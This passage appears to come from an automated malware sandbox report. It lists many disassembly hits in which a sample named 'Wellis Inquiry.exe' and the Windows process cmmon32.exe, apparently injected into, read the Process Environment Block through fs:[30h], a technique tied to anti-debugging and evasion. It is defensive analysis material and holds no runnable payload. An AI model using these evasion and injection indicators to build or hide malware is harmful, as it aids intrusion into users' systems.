Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B4F2E mov eax, dword ptr fs:[00000030h]	3_2_011B4F2E
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B4F2E mov eax, dword ptr fs:[00000030h]	3_2_011B4F2E
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01288F6A mov eax, dword ptr fs:[00000030h]	3_2_01288F6A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011CEF40 mov eax, dword ptr fs:[00000030h]	3_2_011CEF40
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011CFF60 mov eax, dword ptr fs:[00000030h]	3_2_011CFF60
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C8794 mov eax, dword ptr fs:[00000030h]	3_2_011C8794
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01237794 mov eax, dword ptr fs:[00000030h]	3_2_01237794
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01237794 mov eax, dword ptr fs:[00000030h]	3_2_01237794
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01237794 mov eax, dword ptr fs:[00000030h]	3_2_01237794
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F37F5 mov eax, dword ptr fs:[00000030h]	3_2_011F37F5
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EA61C mov eax, dword ptr fs:[00000030h]	3_2_011EA61C
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EA61C mov eax, dword ptr fs:[00000030h]	3_2_011EA61C
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0126FE3F mov eax, dword ptr fs:[00000030h]	3_2_0126FE3F
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BC600 mov eax, dword ptr fs:[00000030h]	3_2_011BC600
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BC600 mov eax, dword ptr fs:[00000030h]	3_2_011BC600
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BC600 mov eax, dword ptr fs:[00000030h]	3_2_011BC600
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E8E00 mov eax, dword ptr fs:[00000030h]	3_2_011E8E00
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271608 mov eax, dword ptr fs:[00000030h]	3_2_01271608
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BE620 mov eax, dword ptr fs:[00000030h]	3_2_011BE620
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]	3_2_011C7E41
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]	3_2_011C7E41
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]	3_2_011C7E41
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]	3_2_011C7E41
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]	3_2_011C7E41
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]	3_2_011C7E41
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0127AE44 mov eax, dword ptr fs:[00000030h]	3_2_0127AE44
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0127AE44 mov eax, dword ptr fs:[00000030h]	3_2_0127AE44
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DAE73 mov eax, dword ptr fs:[00000030h]	3_2_011DAE73
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DAE73 mov eax, dword ptr fs:[00000030h]	3_2_011DAE73
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DAE73 mov eax, dword ptr fs:[00000030h]	3_2_011DAE73
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DAE73 mov eax, dword ptr fs:[00000030h]	3_2_011DAE73
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DAE73 mov eax, dword ptr fs:[00000030h]	3_2_011DAE73
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C766D mov eax, dword ptr fs:[00000030h]	3_2_011C766D
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012346A7 mov eax, dword ptr fs:[00000030h]	3_2_012346A7
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01280EA5 mov eax, dword ptr fs:[00000030h]	3_2_01280EA5
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01280EA5 mov eax, dword ptr fs:[00000030h]	3_2_01280EA5
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01280EA5 mov eax, dword ptr fs:[00000030h]	3_2_01280EA5
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0124FE87 mov eax, dword ptr fs:[00000030h]	3_2_0124FE87
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E36CC mov eax, dword ptr fs:[00000030h]	3_2_011E36CC
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F8EC7 mov eax, dword ptr fs:[00000030h]	3_2_011F8EC7
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0126FEC0 mov eax, dword ptr fs:[00000030h]	3_2_0126FEC0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01288ED6 mov eax, dword ptr fs:[00000030h]	3_2_01288ED6
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E16E0 mov ecx, dword ptr fs:[00000030h]	3_2_011E16E0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C76E2 mov eax, dword ptr fs:[00000030h]	3_2_011C76E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046F746D mov eax, dword ptr fs:[00000030h]	11_2_046F746D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]	11_2_0470AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]	11_2_0470AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]	11_2_0470AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]	11_2_0470AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]	11_2_0470AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]	11_2_0470AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]	11_2_0470AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]	11_2_0470AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]	11_2_0470AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]	11_2_0470AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]	11_2_0470AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]	11_2_046FB477
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]	11_2_046FB477
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]	11_2_046FB477
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]	11_2_046FB477
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]	11_2_046FB477
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]	11_2_046FB477
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]	11_2_046FB477
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]	11_2_046FB477
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]	11_2_046FB477
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]	11_2_046FB477
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]	11_2_046FB477
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]	11_2_046FB477
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0476C450 mov eax, dword ptr fs:[00000030h]	11_2_0476C450
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0476C450 mov eax, dword ptr fs:[00000030h]	11_2_0476C450
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470A44B mov eax, dword ptr fs:[00000030h]	11_2_0470A44B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470BC2C mov eax, dword ptr fs:[00000030h]	11_2_0470BC2C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A740D mov eax, dword ptr fs:[00000030h]	11_2_047A740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A740D mov eax, dword ptr fs:[00000030h]	11_2_047A740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A740D mov eax, dword ptr fs:[00000030h]	11_2_047A740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]	11_2_04791C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]	11_2_04791C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]	11_2_04791C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]	11_2_04791C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]	11_2_04791C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]	11_2_04791C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]	11_2_04791C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]	11_2_04791C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]	11_2_04791C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]	11_2_04791C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]	11_2_04791C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]	11_2_04791C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]	11_2_04791C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]	11_2_04791C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756C0A mov eax, dword ptr fs:[00000030h]	11_2_04756C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756C0A mov eax, dword ptr fs:[00000030h]	11_2_04756C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756C0A mov eax, dword ptr fs:[00000030h]	11_2_04756C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756C0A mov eax, dword ptr fs:[00000030h]	11_2_04756C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047914FB mov eax, dword ptr fs:[00000030h]	11_2_047914FB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756CF0 mov eax, dword ptr fs:[00000030h]	11_2_04756CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756CF0 mov eax, dword ptr fs:[00000030h]	11_2_04756CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756CF0 mov eax, dword ptr fs:[00000030h]	11_2_04756CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A8CD6 mov eax, dword ptr fs:[00000030h]	11_2_047A8CD6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]	11_2_04794496
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]	11_2_04794496
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]	11_2_04794496
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]	11_2_04794496
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]	11_2_04794496
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]	11_2_04794496
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]	11_2_04794496
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]	11_2_04794496
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]	11_2_04794496
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]	11_2_04794496
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]	11_2_04794496
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]	11_2_04794496
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]	11_2_04794496
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E849B mov eax, dword ptr fs:[00000030h]	11_2_046E849B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FC577 mov eax, dword ptr fs:[00000030h]	11_2_046FC577
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FC577 mov eax, dword ptr fs:[00000030h]	11_2_046FC577
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04713D43 mov eax, dword ptr fs:[00000030h]	11_2_04713D43
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04753540 mov eax, dword ptr fs:[00000030h]	11_2_04753540
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04783D40 mov eax, dword ptr fs:[00000030h]	11_2_04783D40
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046F7D50 mov eax, dword ptr fs:[00000030h]	11_2_046F7D50
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479E539 mov eax, dword ptr fs:[00000030h]	11_2_0479E539
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0475A537 mov eax, dword ptr fs:[00000030h]	11_2_0475A537
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04704D3B mov eax, dword ptr fs:[00000030h]	11_2_04704D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04704D3B mov eax, dword ptr fs:[00000030h]	11_2_04704D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04704D3B mov eax, dword ptr fs:[00000030h]	11_2_04704D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A8D34 mov eax, dword ptr fs:[00000030h]	11_2_047A8D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]	11_2_046E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]	11_2_046E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]	11_2_046E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]	11_2_046E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]	11_2_046E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]	11_2_046E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]	11_2_046E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]	11_2_046E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]	11_2_046E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]	11_2_046E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]	11_2_046E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]	11_2_046E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]	11_2_046E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046DAD30 mov eax, dword ptr fs:[00000030h]	11_2_046DAD30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04788DF1 mov eax, dword ptr fs:[00000030h]	11_2_04788DF1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046ED5E0 mov eax, dword ptr fs:[00000030h]	11_2_046ED5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046ED5E0 mov eax, dword ptr fs:[00000030h]	11_2_046ED5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479FDE2 mov eax, dword ptr fs:[00000030h]	11_2_0479FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479FDE2 mov eax, dword ptr fs:[00000030h]	11_2_0479FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479FDE2 mov eax, dword ptr fs:[00000030h]	11_2_0479FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479FDE2 mov eax, dword ptr fs:[00000030h]	11_2_0479FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756DC9 mov eax, dword ptr fs:[00000030h]	11_2_04756DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756DC9 mov eax, dword ptr fs:[00000030h]	11_2_04756DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756DC9 mov eax, dword ptr fs:[00000030h]	11_2_04756DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756DC9 mov ecx, dword ptr fs:[00000030h]	11_2_04756DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756DC9 mov eax, dword ptr fs:[00000030h]	11_2_04756DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756DC9 mov eax, dword ptr fs:[00000030h]	11_2_04756DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04701DB5 mov eax, dword ptr fs:[00000030h]	11_2_04701DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04701DB5 mov eax, dword ptr fs:[00000030h]	11_2_04701DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04701DB5 mov eax, dword ptr fs:[00000030h]	11_2_04701DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047035A1 mov eax, dword ptr fs:[00000030h]	11_2_047035A1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A05AC mov eax, dword ptr fs:[00000030h]	11_2_047A05AC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A05AC mov eax, dword ptr fs:[00000030h]	11_2_047A05AC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D2D8A mov eax, dword ptr fs:[00000030h]	11_2_046D2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D2D8A mov eax, dword ptr fs:[00000030h]	11_2_046D2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D2D8A mov eax, dword ptr fs:[00000030h]	11_2_046D2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D2D8A mov eax, dword ptr fs:[00000030h]	11_2_046D2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D2D8A mov eax, dword ptr fs:[00000030h]	11_2_046D2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470FD9B mov eax, dword ptr fs:[00000030h]	11_2_0470FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470FD9B mov eax, dword ptr fs:[00000030h]	11_2_0470FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04702581 mov eax, dword ptr fs:[00000030h]	11_2_04702581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04702581 mov eax, dword ptr fs:[00000030h]	11_2_04702581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04702581 mov eax, dword ptr fs:[00000030h]	11_2_04702581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04702581 mov eax, dword ptr fs:[00000030h]	11_2_04702581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]	11_2_04792D82
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]	11_2_04792D82
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]	11_2_04792D82
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]	11_2_04792D82
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]	11_2_04792D82
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]	11_2_04792D82
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]	11_2_04792D82
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E766D mov eax, dword ptr fs:[00000030h]	11_2_046E766D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FAE73 mov eax, dword ptr fs:[00000030h]	11_2_046FAE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FAE73 mov eax, dword ptr fs:[00000030h]	11_2_046FAE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FAE73 mov eax, dword ptr fs:[00000030h]	11_2_046FAE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FAE73 mov eax, dword ptr fs:[00000030h]	11_2_046FAE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FAE73 mov eax, dword ptr fs:[00000030h]	11_2_046FAE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]	11_2_046E7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]	11_2_046E7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]	11_2_046E7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]	11_2_046E7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]	11_2_046E7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]	11_2_046E7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479AE44 mov eax, dword ptr fs:[00000030h]	11_2_0479AE44
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479AE44 mov eax, dword ptr fs:[00000030h]	11_2_0479AE44
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0478FE3F mov eax, dword ptr fs:[00000030h]	11_2_0478FE3F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046DE620 mov eax, dword ptr fs:[00000030h]	11_2_046DE620
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470A61C mov eax, dword ptr fs:[00000030h]	11_2_0470A61C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470A61C mov eax, dword ptr fs:[00000030h]	11_2_0470A61C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046DC600 mov eax, dword ptr fs:[00000030h]	11_2_046DC600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046DC600 mov eax, dword ptr fs:[00000030h]	11_2_046DC600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046DC600 mov eax, dword ptr fs:[00000030h]	11_2_046DC600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04708E00 mov eax, dword ptr fs:[00000030h]	11_2_04708E00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791608 mov eax, dword ptr fs:[00000030h]	11_2_04791608
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E76E2 mov eax, dword ptr fs:[00000030h]	11_2_046E76E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047016E0 mov ecx, dword ptr fs:[00000030h]	11_2_047016E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A8ED6 mov eax, dword ptr fs:[00000030h]	11_2_047A8ED6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04718EC7 mov eax, dword ptr fs:[00000030h]	11_2_04718EC7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0478FEC0 mov eax, dword ptr fs:[00000030h]	11_2_0478FEC0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047036CC mov eax, dword ptr fs:[00000030h]	11_2_047036CC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047546A7 mov eax, dword ptr fs:[00000030h]	11_2_047546A7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A0EA5 mov eax, dword ptr fs:[00000030h]	11_2_047A0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A0EA5 mov eax, dword ptr fs:[00000030h]	11_2_047A0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A0EA5 mov eax, dword ptr fs:[00000030h]	11_2_047A0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0476FE87 mov eax, dword ptr fs:[00000030h]	11_2_0476FE87
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046EFF60 mov eax, dword ptr fs:[00000030h]	11_2_046EFF60
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A8F6A mov eax, dword ptr fs:[00000030h]	11_2_047A8F6A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046EEF40 mov eax, dword ptr fs:[00000030h]	11_2_046EEF40
